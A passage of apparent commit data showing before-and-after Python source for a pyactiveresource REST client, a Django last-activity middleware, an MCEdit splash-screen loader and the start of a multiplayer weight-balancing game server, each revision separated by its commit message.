cls._site, cls._user, cls._password, cls._timeout)
return cls._connection_obj
@classmethod
def _scrub_name(cls, name):
"""Remove invalid characters from attribute names.
Args:
name: the string to scrub
Returns:
The part of the string that is a valid name, or None if unscrubbable
"""
name = name.lower().replace('-', '_')
match = VALID_NAME.search(name)
if match:
return match.group(0)
return None
# Public instance methods
def to_dict(self):
"""Convert the object to a dictionary."""
values = {}
for key, value in self.attributes.iteritems():
if isinstance(value, list):
values[key] = [i.to_dict() for i in value]
elif isinstance(value, ActiveResource):
values[key] = value.to_dict()
else:
values[key] = value
return values
def to_xml(self, root=None, header=True, pretty=False):
"""Convert the object to an xml string.
Args:
root: The name of the root element for xml output.
header: Whether to include the xml header.
Returns:
An xml string.
"""
if not root:
root = self._singular
return util.to_xml(self.to_dict(), root=root,
header=header, pretty=pretty)
def save(self):
"""Save the object to the server.
Args:
None
Returns:
None.
Raises:
connection.Error: On any communications problems.
"""
if self.id:
response = self._connection().put(
self._element_path(self.id, self._prefix_options),
self._headers,
data=self.to_xml())
else:
response = self._connection().post(
self._collection_path(self._prefix_options),
self._headers,
data=self.to_xml())
try:
attributes = util.xml_to_dict(response)
except Error:
return
self._update(attributes)
return response
def destroy(self):
"""Deletes the resource from the remote service.
Args:
None
Returns:
None
"""
self._connection().delete(
self._element_path(self.id, self._prefix_options),
self.__class__._headers)
def __getattr__(self, name):
"""Retrieve the requested attribute if it exists.
Args:
name: The attribute name.
Returns:
The attribute's value.
Raises:
AttributeError: if no such attribute exists.
"""
#TODO(mrroach): Use descriptors instead of __getattr__
if name == 'id':
# id should always be getattrable
return self.attributes.get('id')
if name in self.attributes:
return self.attributes[name]
raise AttributeError(name)
def __setattr__(self, name, value):
"""Set the named attributes.
Args:
name: The attribute name.
value: The attribute's value.
Returns:
None
"""
if '_initialized' in self.__dict__:
if name in self.__dict__ or name in self.__class__.__dict__:
# Update a normal attribute
object.__setattr__(self, name, value)
else:
# Add/update an attribute
self.attributes[name] = value
object.__setattr__(self, name, value)
def __repr__(self):
return '%s(%s)' % (self._singular, self.id)
def __cmp__(self, other):
if isinstance(other, self.__class__):
return cmp(self.id, other.id)
else:
return cmp(self.id, other)
def _update(self, attributes):
"""Update the object with the given attributes.
Args:
attributes: A dictionary of attributes.
Returns:
None
"""
self.attributes = {}
# Add all the tags in the element as attributes
for key, value in attributes.items():
if isinstance(value, dict):
klass = self._find_class_for(key)
attr = klass(value)
elif isinstance(value, list):
klass = self._find_class_for(util.singularize(key))
attr = [klass(child) for child in value]
else:
attr = value
# Store the actual value in the attributes dictionary
self.attributes[key] = attr
attr_name = self._scrub_name(key)
def _find_class_for(self, element_name=None, class_name=None):
"""Look in the parent modules for classes matching the element name.
One, or both of element/class name must be specified.
Args:
element_name: The name of the element type.
class_name: The class name of the element type.
Returns:
A Resource class.
"""
if not element_name and not class_name:
raise Error('One of element_name,class_name must be specified.')
elif not element_name:
element_name = util.underscore(class_name)
elif not class_name:
class_name = util.camelize(element_name)
module_path = self.__module__.split('.')
for depth in range(len(module_path), 0, -1):
try:
__import__('.'.join(module_path[:depth]))
module = sys.modules['.'.join(module_path[:depth])]
except ImportError:
continue
try:
klass = getattr(module, class_name)
return klass
except AttributeError:
try:
__import__('.'.join([module.__name__, element_name]))
submodule = sys.modules['.'.join([module.__name__,
element_name])]
except ImportError:
continue
try:
klass = getattr(submodule, class_name)
return klass
except AttributeError:
continue
# If we made it this far, no such class was found
return new.classobj(class_name, (self.__class__,),
{'__module__': self.__module__})
# methods corresponding to Ruby's custom_methods
def _custom_method_element_url(self, method_name, options):
prefix_options, query_options = self._split_options(options)
prefix_options.update(self._prefix_options)
path = (
'%(prefix)s/%(plural)s/%(id)s/%(method_name)s.%(format)s%(query)s' %
{'prefix': self._prefix(prefix_options),
'plural': self._plural,
'id': self.id,
'method_name': method_name,
'format': 'xml',
'query': self._query_string(query_options)})
return path
def _custom_method_new_element_url(self, method_name, options):
prefix_options, query_options = self._split_options(options)
prefix_options.update(self._prefix_options)
path = (
'%(prefix)s/%(plural)s/new/%(method_name)s.%(format)s%(query)s' %
{'prefix': self._prefix(prefix_options),
'plural': self._plural,
'method_name': method_name,
'format': 'xml',
'query': self._query_string(query_options)})
return path
def _instance_get(self, method_name, **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = self._custom_method_element_url(method_name, kwargs)
return util.xml_to_dict(self._connection().get(url, self._headers))
def _instance_post(self, method_name, body='', **kwargs):
"""Create a new resource/nested resource.
Args:
method_name: the nested resource to post to.
body: The data to send as the body of the request.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
if self.id:
url = self._custom_method_element_url(method_name, kwargs)
else:
if not body:
body = self.to_xml()
url = self._custom_method_new_element_url(method_name, kwargs)
return self._connection().post(url, self._headers, body)
def _instance_put(self, method_name, body='', **kwargs):
"""Update a nested resource.
Args:
method_name: the nested resource to update.
body: The data to send as the body of the request.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = self._custom_method_element_url(method_name, kwargs)
return self._connection().put(url, self._headers, body)
def _instance_delete(self, method_name, **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = self._custom_method_element_url(method_name, kwargs)
return self._connection().delete(url, self._headers)
# Create property which returns class/instance method based on context
get = ClassAndInstanceMethod('_class_get', '_instance_get')
post = ClassAndInstanceMethod('_class_post', '_instance_post')
put = ClassAndInstanceMethod('_class_put', '_instance_put')
delete = ClassAndInstanceMethod('_class_delete', '_instance_delete')
Match ruby's xml format better by using saveroot and throwing away the top-level root for hashes
#!/usr/bin/python2.4
# Authors: Jared Kuolt <me@superjared.com>, Mark Roach <mrroach@google.com>
"""Connect to and interact with a REST server and its objects."""
import new
import re
import sys
import urllib
import urlparse
from string import Template
from pyactiveresource import connection
from pyactiveresource import util
VALID_NAME = re.compile('[a-z_]\w*') # Valid python attribute names
class Error(Exception):
"""A general error derived from Exception."""
pass
class ResourceMeta(type):
"""A metaclass to handle singular/plural attributes."""
def __new__(mcs, name, bases, new_attrs):
"""Create a new class.
Args:
mcs: The metaclass.
name: The name of the class.
bases: List of base classes from which mcs inherits.
new_attrs: The class attribute dictionary.
"""
if '_singular' not in new_attrs or not new_attrs['_singular']:
# Convert CamelCase to lower_underscore
singular = re.sub(r'\B((?<=[a-z])[A-Z]|[A-Z](?=[a-z]))',
r'_\1', name).lower()
new_attrs['_singular'] = singular
if '_plural' not in new_attrs or not new_attrs['_plural']:
new_attrs['_plural'] = util.pluralize(new_attrs['_singular'])
klass = type.__new__(mcs, name, bases, new_attrs)
return klass
class ClassAndInstanceMethod(object):
"""A descriptor which allows class/instance methods to have the same name."""
def __init__(self, class_method, instance_method):
self.class_method = class_method
self.instance_method = instance_method
def __get__(self, instance, owner):
if instance:
return getattr(instance, self.instance_method)
return getattr(owner, self.class_method)
class ActiveResource(object):
"""Represents an activeresource object."""
__metaclass__ = ResourceMeta
_site = ''
_user = ''
_password = ''
_connection_obj = None
_headers = None
_timeout = 5
def __init__(self, attributes, prefix_options=None):
"""Initialize a new ActiveResource object.
Args:
attributes: A dictionary of attributes which represent this object.
prefix_options: A dict of prefixes to add to the request for
nested URLs.
"""
self.attributes = {}
if prefix_options:
self._prefix_options = prefix_options
else:
self._prefix_options = {}
self._update(attributes)
self._initialized = True
# Public class methods which act as factory functions
@classmethod
def find(cls, id_=None, from_=None, **kwargs):
"""Core method for finding resources.
Args:
id_: A specific resource to retrieve.
from_: The path that resources will be fetched from.
kwargs: any keyword arguments for query.
Returns:
An ActiveResource object.
Raises:
connection.Error: On any communications errors.
Error: On any other errors.
"""
if id_:
return cls._find_single(id_, **kwargs)
return cls._find_every(from_=from_, **kwargs)
@classmethod
def find_one(cls, from_, **kwargs):
"""Get a single resource from a specific URL.
Args:
from_: The path that resources will be fetched from.
kwargs: Any keyword arguments for query.
Returns:
An ActiveResource object.
Raises:
connection.Error: On any communications errors.
Error: On any other errors.
"""
return cls._find_one(from_, kwargs)
@classmethod
def exists(cls, id_, **kwargs):
"""Check whether a resource exists.
Args:
id_: The id or other key which specifies a unique object.
kwargs: Any keyword arguments for query.
Returns:
True if the resource is found, False otherwise.
"""
prefix_options, query_options = cls._split_options(kwargs)
path = cls._element_path(id_, prefix_options, query_options)
try:
_ = cls._connection().head(path, cls._headers)
return True
except connection.Error:
return False
# Non-public class methods to support the above
@classmethod
def _split_options(cls, options):
"""Split prefix options and query options.
Args:
options: A dictionary of prefix and/or query options.
Returns:
A tuple containing (prefix_options, query_options)
"""
#TODO(mrroach): figure out prefix_options
prefix_options = {}
query_options = {}
for key, value in options.items():
if key in cls._prefix_parameters():
prefix_options[key] = value
else:
query_options[key] = value
return [prefix_options, query_options]
@classmethod
def _find_single(cls, id_, **kwargs):
"""Get a single object from the default URL.
Args:
id_: The id or other key which specifies a unique object.
kwargs: Any keyword arguments for the query.
Returns:
An ActiveResource object.
Raises:
ConnectionError: On any error condition.
"""
prefix_options, query_options = cls._split_options(kwargs)
path = cls._element_path(id_, prefix_options, query_options)
return cls._build_object(cls._connection().get(path, cls._headers),
prefix_options)
@classmethod
def _find_one(cls, from_, query_options):
"""Find a single resource from a one-off URL.
Args:
from_: The path from which to retrieve the resource.
query_options: Any keyword arguments for the query.
Returns:
An ActiveResource object.
Raises:
connection.ConnectionError: On any error condition.
"""
#TODO(mrroach): allow from_ to be a string-generating function
path = from_ + cls._query_string(query_options)
return cls._build_object(cls._connection().get(path, cls._headers))
@classmethod
def _find_every(cls, from_=None, **kwargs):
"""Get all resources.
Args:
from_: (optional) The path from which to retrieve the resource.
kwargs: Any keyword arguments for the query.
Returns:
A list of resources.
"""
if from_:
path = from_ + cls._query_string(kwargs)
prefix_options = None
else:
prefix_options, query_options = cls._split_options(kwargs)
path = cls._collection_path(prefix_options, query_options)
return cls._build_list(cls._connection().get(path, cls._headers),
prefix_options)
@classmethod
def _build_object(cls, xml, prefix_options=None):
"""Create an object or objects for the given xml string.
Args:
xml: An xml string containing the object definition.
prefix_options: A dict of prefixes to add to the request for
nested URLs.
Returns:
An ActiveResource object.
"""
element_type, attributes = util.xml_to_dict(
xml, saveroot=True).items()[0]
return cls(attributes, prefix_options)
@classmethod
def _build_list(cls, xml, prefix_options=None):
"""Create a list of objects for the given xml string.
Args:
xml: An xml string containing multiple object definitions.
prefix_options: A dict of prefixes to add to the request for
nested URLs.
Returns:
A list of ActiveResource objects.
"""
resources = []
collection_type, elements = util.xml_to_dict(
xml, saveroot=True).items()[0]
for element in elements:
resources.append(cls(element, prefix_options))
return resources
@classmethod
def _query_string(cls, query_options):
"""Return a query string for the given options.
Args:
query_options: A dictionary of query keys/values.
Returns:
A string containing the encoded query.
"""
if query_options:
return '?' + urllib.urlencode(query_options)
else:
return ''
@classmethod
def _element_path(cls, id_, prefix_options=None, query_options=None):
"""Get the element path for the given id.
Examples:
Comment.element_path(1, {'post_id': 5}) -> /posts/5/act
Args:
id_: The id of the object to retrieve.
prefix_options: A dict of prefixes to add to the request for
nested URLs.
query_options: A dict of items to add to the query string for
the request.
Returns:
The path (relative to site) to the element formatted with the query.
"""
return '%(prefix)s/%(plural)s/%(id)s.%(format)s%(query)s' % {
'prefix': cls._prefix(prefix_options),
'plural': cls._plural,
'id': id_,
'format': 'xml',
'query': cls._query_string(query_options)}
@classmethod
def _collection_path(cls, prefix_options=None, query_options=None):
"""Get the collection path for this object type.
Examples:
Comment.collection_path() -> /comments.xml
Comment.collection_path(query_options={'active': 1})
-> /comments.xml?active=1
Comment.collection_path({'posts': 5})
-> /posts/5/comments.xml
Args:
prefix_options: A dict of prefixes to add to the request for
nested URLs
query_options: A dict of items to add to the query string for
the request.
Returns:
The path (relative to site) to this type of collection.
"""
return '%(prefix)s/%(plural)s.%(format)s%(query)s' % {
'prefix': cls._prefix(prefix_options),
'plural': cls._plural,
'format': 'xml',
'query': cls._query_string(query_options)}
@classmethod
def _custom_method_collection_url(cls, method_name, options):
prefix_options, query_options = cls._split_options(options)
path = (
'%(prefix)s/%(plural)s/%(method_name)s.%(format)s%(query)s' %
{'prefix': cls._prefix(prefix_options),
'plural': cls._plural,
'method_name': method_name,
'format': 'xml',
'query': cls._query_string(query_options)})
return path
@classmethod
def _class_get(cls, method_name, **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = cls._custom_method_collection_url(method_name, kwargs)
return util.xml_to_dict(cls._connection().get(url, cls._headers))
@classmethod
def _class_post(cls, method_name, body='', **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
body: The data to send as the body of the request.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = cls._custom_method_collection_url(method_name, kwargs)
return cls._connection().post(url, cls._headers, body)
@classmethod
def _class_put(cls, method_name, body='', **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
body: The data to send as the body of the request.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = cls._custom_method_collection_url(method_name, kwargs)
return cls._connection().put(url, cls._headers, body)
@classmethod
def _class_delete(cls, method_name, **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = cls._custom_method_collection_url(method_name, kwargs)
return cls._connection().delete(url, cls._headers)
@classmethod
def _prefix_parameters(cls):
"""Return a list of the parameters used in the site prefix.
e.g. /objects/$object_id would yield ['object_id']
/objects/${object_id}/people/$person_id/ would yield
['object_id', 'person_id']
Args:
None
Returns:
A set of named parameters.
"""
path = urlparse.urlsplit(cls._site)[2]
template = Template(path)
keys = set()
for match in template.pattern.finditer(path):
for match_type in 'braced', 'named':
if match.groupdict()[match_type]:
keys.add(match.groupdict()[match_type])
return keys
@classmethod
def _prefix(cls, options=None):
"""Return the prefix for this object type.
Args:
options: A dictionary containing additional prefixes to prepend.
Returns:
A string containing the path to this element.
"""
path = re.sub('/$', '', urlparse.urlsplit(cls._site)[2])
template = Template(path)
keys = cls._prefix_parameters()
options = dict([(k, options.get(k, '')) for k in keys])
return template.safe_substitute(options)
@classmethod
def _connection(cls):
"""Return a connection object which handles HTTP requests."""
if not cls._connection_obj:
cls._connection_obj = connection.Connection(
cls._site, cls._user, cls._password, cls._timeout)
return cls._connection_obj
@classmethod
def _scrub_name(cls, name):
"""Remove invalid characters from attribute names.
Args:
name: the string to scrub
Returns:
The part of the string that is a valid name, or None if unscrubbable
"""
name = name.lower().replace('-', '_')
match = VALID_NAME.search(name)
if match:
return match.group(0)
return None
# Public instance methods
def to_dict(self):
"""Convert the object to a dictionary."""
values = {}
for key, value in self.attributes.iteritems():
if isinstance(value, list):
values[key] = [i.to_dict() for i in value]
elif isinstance(value, ActiveResource):
values[key] = value.to_dict()
else:
values[key] = value
return values
def to_xml(self, root=None, header=True, pretty=False):
"""Convert the object to an xml string.
Args:
root: The name of the root element for xml output.
header: Whether to include the xml header.
Returns:
An xml string.
"""
if not root:
root = self._singular
return util.to_xml(self.to_dict(), root=root,
header=header, pretty=pretty)
def save(self):
"""Save the object to the server.
Args:
None
Returns:
None.
Raises:
connection.Error: On any communications problems.
"""
if self.id:
response = self._connection().put(
self._element_path(self.id, self._prefix_options),
self._headers,
data=self.to_xml())
else:
response = self._connection().post(
self._collection_path(self._prefix_options),
self._headers,
data=self.to_xml())
try:
attributes = util.xml_to_dict(response)
except Error:
return
self._update(attributes)
return response
def destroy(self):
"""Deletes the resource from the remote service.
Args:
None
Returns:
None
"""
self._connection().delete(
self._element_path(self.id, self._prefix_options),
self.__class__._headers)
def __getattr__(self, name):
"""Retrieve the requested attribute if it exists.
Args:
name: The attribute name.
Returns:
The attribute's value.
Raises:
AttributeError: if no such attribute exists.
"""
#TODO(mrroach): Use descriptors instead of __getattr__
if name == 'id':
# id should always be getattrable
return self.attributes.get('id')
if name in self.attributes:
return self.attributes[name]
raise AttributeError(name)
def __setattr__(self, name, value):
"""Set the named attributes.
Args:
name: The attribute name.
value: The attribute's value.
Returns:
None
"""
if '_initialized' in self.__dict__:
if name in self.__dict__ or name in self.__class__.__dict__:
# Update a normal attribute
object.__setattr__(self, name, value)
else:
# Add/update an attribute
self.attributes[name] = value
object.__setattr__(self, name, value)
def __repr__(self):
return '%s(%s)' % (self._singular, self.id)
def __cmp__(self, other):
if isinstance(other, self.__class__):
return cmp(self.id, other.id)
else:
return cmp(self.id, other)
def _update(self, attributes):
"""Update the object with the given attributes.
Args:
attributes: A dictionary of attributes.
Returns:
None
"""
self.attributes = {}
# Add all the tags in the element as attributes
for key, value in attributes.items():
if isinstance(value, dict):
klass = self._find_class_for(key)
attr = klass(value)
elif isinstance(value, list):
klass = self._find_class_for(util.singularize(key))
attr = [klass(child) for child in value]
else:
attr = value
# Store the actual value in the attributes dictionary
self.attributes[key] = attr
attr_name = self._scrub_name(key)
def _find_class_for(self, element_name=None, class_name=None):
"""Look in the parent modules for classes matching the element name.
One, or both of element/class name must be specified.
Args:
element_name: The name of the element type.
class_name: The class name of the element type.
Returns:
A Resource class.
"""
if not element_name and not class_name:
raise Error('One of element_name,class_name must be specified.')
elif not element_name:
element_name = util.underscore(class_name)
elif not class_name:
class_name = util.camelize(element_name)
module_path = self.__module__.split('.')
for depth in range(len(module_path), 0, -1):
try:
__import__('.'.join(module_path[:depth]))
module = sys.modules['.'.join(module_path[:depth])]
except ImportError:
continue
try:
klass = getattr(module, class_name)
return klass
except AttributeError:
try:
__import__('.'.join([module.__name__, element_name]))
submodule = sys.modules['.'.join([module.__name__,
element_name])]
except ImportError:
continue
try:
klass = getattr(submodule, class_name)
return klass
except AttributeError:
continue
# If we made it this far, no such class was found
return new.classobj(class_name, (self.__class__,),
{'__module__': self.__module__})
# methods corresponding to Ruby's custom_methods
def _custom_method_element_url(self, method_name, options):
prefix_options, query_options = self._split_options(options)
prefix_options.update(self._prefix_options)
path = (
'%(prefix)s/%(plural)s/%(id)s/%(method_name)s.%(format)s%(query)s' %
{'prefix': self._prefix(prefix_options),
'plural': self._plural,
'id': self.id,
'method_name': method_name,
'format': 'xml',
'query': self._query_string(query_options)})
return path
def _custom_method_new_element_url(self, method_name, options):
prefix_options, query_options = self._split_options(options)
prefix_options.update(self._prefix_options)
path = (
'%(prefix)s/%(plural)s/new/%(method_name)s.%(format)s%(query)s' %
{'prefix': self._prefix(prefix_options),
'plural': self._plural,
'method_name': method_name,
'format': 'xml',
'query': self._query_string(query_options)})
return path
def _instance_get(self, method_name, **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = self._custom_method_element_url(method_name, kwargs)
data = util.xml_to_dict(self._connection().get(url, self._headers),
saveroot=True)
if isinstance(data, dict) and len(data.keys()) == 1:
return data.values()[0]
else:
return data
def _instance_post(self, method_name, body='', **kwargs):
"""Create a new resource/nested resource.
Args:
method_name: the nested resource to post to.
body: The data to send as the body of the request.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
if self.id:
url = self._custom_method_element_url(method_name, kwargs)
else:
if not body:
body = self.to_xml()
url = self._custom_method_new_element_url(method_name, kwargs)
return self._connection().post(url, self._headers, body)
def _instance_put(self, method_name, body='', **kwargs):
"""Update a nested resource.
Args:
method_name: the nested resource to update.
body: The data to send as the body of the request.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = self._custom_method_element_url(method_name, kwargs)
return self._connection().put(url, self._headers, body)
def _instance_delete(self, method_name, **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = self._custom_method_element_url(method_name, kwargs)
return self._connection().delete(url, self._headers)
# Create property which returns class/instance method based on context
get = ClassAndInstanceMethod('_class_get', '_instance_get')
post = ClassAndInstanceMethod('_class_post', '_instance_post')
put = ClassAndInstanceMethod('_class_put', '_instance_put')
delete = ClassAndInstanceMethod('_class_delete', '_instance_delete')
|
"""
Middleware for the user accounts app.
"""
from django.utils import timezone
class LastActivityDateUpdateMiddleware(object):
"""
Middleware for updating the "last activity date" of authenticated users.
"""
def process_request(self, request):
"""
Process the request, update the last activity date of current user.
:param request: The incoming request
:return: None
"""
# Only handle authenticated users
current_user = request.user
if current_user.is_authenticated():
# Update last login IP address
user_profile = current_user.user_profile
user_profile.last_activity_date = timezone.now()
user_profile.save_no_rendering(update_fields=('last_activity_date',))
Update docstring and add fixme for future revision
"""
Middleware for the user accounts app.
"""
from django.utils import timezone
class LastActivityDateUpdateMiddleware(object):
"""
Middleware for updating the "last activity date" of authenticated users.
"""
def process_request(self, request):
"""
Process the request, update the last activity date of current user if logged-in.
:param request: The current request instance.
"""
# Only handle authenticated users
current_user = request.user
if current_user.is_authenticated():
# Update last login IP address
# FIXME This generate two SQL requests per view. Maybe use update_or_create instead?
user_profile = current_user.user_profile
user_profile.last_activity_date = timezone.now()
user_profile.save_no_rendering(update_fields=('last_activity_date',))
|
#! /usr/bin/env python
# Taken from http://www.pygame.org/project-Splash+screen-1186-.html by Rock Achu (rockhachu2)
# and tweaked ;)
import os
import directories
if os.sys.platform == 'linux2':
os.sys.path.insert(1, os.path.expanduser('~/.local/lib/python2.7/site-packages'))
os.sys.path.insert(1, os.path.abspath('./lib'))
import pygame
print 'Splash load...'
os.environ['SDL_VIDEO_CENTERED'] = '1'
pygame.init()
pygame.font.init()
no_splash = False
cur_dir = directories.getDataDir()
splash_name = os.path.join(cur_dir, 'splash')
splash = None
try:
found = False
if os.path.exists(splash_name):
splash_img = open(splash_name).read().strip()
if os.path.exists(splash_img) and splash_img.split('.')[-1].lower() in ('jpg', 'png', 'bmp', 'pcx', 'tif', 'lbm', 'pbm', 'pgm', 'ppm', 'xpm'):
found = True
splash = pygame.image.load(open(splash_img, 'rb'))
if not found:
splash = pygame.image.load(open(os.path.join(cur_dir, "splash.png"), 'rb'))
screen = pygame.display.set_mode(splash.get_size(), pygame.NOFRAME)
screen.blit(splash, (0, 0))
except Exception, e:
print e
try:
f = open(os.path.join(cur_dir, 'fonts', 'DejaVuSans-Bold.ttf'), 'rb')
font = pygame.font.Font(f, 48)
buf = font.render("MCEDit is loading...", True, (128, 128, 128))
screen = pygame.display.set_mode((buf.get_width() + 20, buf.get_height() + 20), pygame.NOFRAME)
screen.blit(buf, (10, 10))
splash = pygame.display.get_surface()
except Exception, _e:
print _e
splash = pygame.display.set_mode((1, 1))
no_splash = True
if splash:
pygame.display.update()
#os.environ['SDL_VIDEO_CENTERED'] = '0' # Done later, when initializing MCEdit 'real' display.
# Random splash
#
# Uses a 'splash' file to check the state.
# This file contains the name of the splash to be loaded next time MCEdit starts.
# No splash file means it has to be created.
# An empty file means the 'splash.png' file will always be used.
#
if not os.path.exists(splash_name):
open(splash_name, 'w').write('scrap')
if len(open(splash_name).read()) > 0:
from random import choice
splashes_folder = os.path.join(cur_dir, 'splashes')
if not os.path.exists(splashes_folder):
splashes_folder = os.path.join(cur_dir, splashes_folder)
if os.path.exists(splashes_folder) and os.listdir(splashes_folder):
new_splash = choice(os.listdir(splashes_folder))
if new_splash.split('.')[-1].lower() in ('jpg', 'png', 'bmp', 'pcx', 'tif', 'lbm', 'pbm', 'pgm', 'ppm', 'xpm'):
open(splash_name, 'w').write(os.path.join(cur_dir, splashes_folder, new_splash))
Added exception handling to writing of the splash file
#! /usr/bin/env python
# Taken from http://www.pygame.org/project-Splash+screen-1186-.html by Rock Achu (rockhachu2)
# and tweaked ;)
import os
import directories
if os.sys.platform == 'linux2':
os.sys.path.insert(1, os.path.expanduser('~/.local/lib/python2.7/site-packages'))
os.sys.path.insert(1, os.path.abspath('./lib'))
import pygame
print 'Splash load...'
os.environ['SDL_VIDEO_CENTERED'] = '1'
pygame.init()
pygame.font.init()
no_splash = False
cur_dir = directories.getDataDir()
splash_name = os.path.join(cur_dir, 'splash')
splash = None
try:
found = False
if os.path.exists(splash_name):
splash_img = open(splash_name).read().strip()
if os.path.exists(splash_img) and splash_img.split('.')[-1].lower() in ('jpg', 'png', 'bmp', 'pcx', 'tif', 'lbm', 'pbm', 'pgm', 'ppm', 'xpm'):
found = True
splash = pygame.image.load(open(splash_img, 'rb'))
if not found:
splash = pygame.image.load(open(os.path.join(cur_dir, "splash.png"), 'rb'))
screen = pygame.display.set_mode(splash.get_size(), pygame.NOFRAME)
screen.blit(splash, (0, 0))
except Exception, e:
print e
try:
f = open(os.path.join(cur_dir, 'fonts', 'DejaVuSans-Bold.ttf'), 'rb')
font = pygame.font.Font(f, 48)
buf = font.render("MCEDit is loading...", True, (128, 128, 128))
screen = pygame.display.set_mode((buf.get_width() + 20, buf.get_height() + 20), pygame.NOFRAME)
screen.blit(buf, (10, 10))
splash = pygame.display.get_surface()
except Exception, _e:
print _e
splash = pygame.display.set_mode((1, 1))
no_splash = True
if splash:
pygame.display.update()
#os.environ['SDL_VIDEO_CENTERED'] = '0' # Done later, when initializing MCEdit 'real' display.
# Random splash
#
# Uses a 'splash' file to check the state.
# This file contains the name of the splash to be loaded next time MCEdit starts.
# No splash file means it has to be created.
# An empty file means the 'splash.png' file will always be used.
#
if not os.path.exists(splash_name):
try:
open(splash_name, 'w').write('scrap')
except:
pass
if len(open(splash_name).read()) > 0:
from random import choice
splashes_folder = os.path.join(cur_dir, 'splashes')
if not os.path.exists(splashes_folder):
splashes_folder = os.path.join(cur_dir, splashes_folder)
if os.path.exists(splashes_folder) and os.listdir(splashes_folder):
new_splash = choice(os.listdir(splashes_folder))
if new_splash.split('.')[-1].lower() in ('jpg', 'png', 'bmp', 'pcx', 'tif', 'lbm', 'pbm', 'pgm', 'ppm', 'xpm'):
try:
open(splash_name, 'w').write(os.path.join(cur_dir, splashes_folder, new_splash))
except:
pass
|
#!/usr/bin/python3
from Games.Game import Game
import time
import random
from math import ceil, floor;
from Team import Team
import os.path
if __name__ == "__main__":
raise Exception("You cannot run this file directly")
class game(Game):
def __init__(self, players):
self.filename = os.path.dirname(os.path.realpath(__file__));
self.load()
self.players = players
self.teams = []
self.playable = False
self.started = False
self.winner = False
def addPlayer(self, player):
self.players.append(player)
return self
def doAction(self, data):
print(self.players)
try:
action = data['action']
except KeyError:
return False
try:
player = self.getPlayerById(data['id'])
print(player)
except KeyError:
return False
if not player:
return False
update = False
if action == 'move':
args = {}
try:
args['from'] = data['from']
except KeyError:
return False
try:
args['to'] = data['to']
except KeyError:
return False
try:
args['weight'] = data['weight']
except KeyError:
return False
if args['from'] == 'available':
if args['to'] == 'left' or args['to'] == 'right':
if self.moveValueToWeight(player, args['weight'], player.data['dataGame'][args['to']]):
data['action'] = 'move_accepted';
player.sendMessage(data)
return True
elif args['from'] == 'left' or args['from'] == 'right':
if args['to'] == 'available':
if self.moveValueFromWeight(player, args['weight'], player.data['dataGame'][args['from']]):
data['action'] = 'move_accepted';
player.sendMessage(data)
update = True
else:
if self.moveValueBetweenWeights(player, player.data['dataGame'][args['from']], player.data['dataGame'][args['to']], args['weight']):
data['action'] = 'move_accepted';
player.sendMessage(data)
update = True
elif action == 'proposition':
args = {}
try:
args['from'] = data['from']
except KeyError:
return False
try:
args['to'] = self.getPlayerById(data['to'])
except KeyError:
return False
try:
args['weight'] = data['weight']
except KeyError:
return False
if args['from'] == 'left' or args['from'] == 'right':
if not self.moveValueFromWeight(player, args['weight'], player.data['dataGame'][args['from']]):
return False
if self.setProposition(player, args['to'], args['weight']):
data['action'] = 'proposition_accepted'
player.sendMessage(data)
update = True
elif action == "start":
if not self.playable:
self.start()
for player in self.players:
player.sendMessage({
"action": "updateStatus",
"gameStatus": "playable",
"playerData": self.getPlayerUpdate(player)
})
update = True
if update:
if self.checkWinStatement():
for player in self.players:
player.sendMessage({
"gameStatus": "end",
"action": "updateStatus",
"winner": self.winner
})
return True
"""
try:
value = data['value']
except KeyError:
value = False
default = {
"action": "none"
}
if not self.playable:
if not self.started:
pass
else:
if player:
player.sendMessage({
"gameStatus": "end",
"action": "updateStatus",
"winner": self.winner,
})
update = True
elif data['action'] == "moveValueToWeight":
try:
weight = data['weight']
if int(weight) == 0:
weight = self.player.data['dataGame']['left']
else:
weight = self.player.data['dataGame']['right']
except KeyError:
weight = False
if weight and player and value:
data['success'] = self.moveValueToWeight(player, value, weight)
else:
data['success'] = False
data['playerData'] = self.getPlayerUpdate(player)
if player:
player.sendMessage(data)
update = True
elif data['action'] == "moveValueFromWeight":
try:
weight = data['weight']
if int(weight) == 0:
weight = self.player.data['dataGame']['propositions']['left']
else:
weight = self.player.data['dataGame']['propositions']['left']
except KeyError:
weight = False
if weight and player and value:
data['success'] = self.moveValueFromWeight(player, value, weight)
else:
data['success'] = False
data['playerData'] = self.getPlayerUpdate(player)
if player:
player.sendMessage(data)
update = True
elif data['action'] == "setProposition":
try:
playerTo = self.getPlayerById(data['to'])
except KeyError:
playerTo = False
if playerTo and player and value:
data['success'] = self.setProposition(player, playerTo, value)
else:
data['success'] = False
if player and playerTo:
data['playerData'] = self.getPlayerUpdate(player)
player.sendMessage(data)
data['action'] = "update"
data['playerData'] = self.getPlayerUpdate(playerTo)
playerTo.sendMessage(data)
update = True
elif data['action'] == "removeProposition":
try:
playerTo = self.getPlayerById(data['to'])
except KeyError:
playerTo = False
if playerTo and player:
data['success'] = self.removeProposition(player, playerTo)
else:
data['success'] = False
if player and playerTo:
data['playerData'] = self.getPlayerUpdate(player)
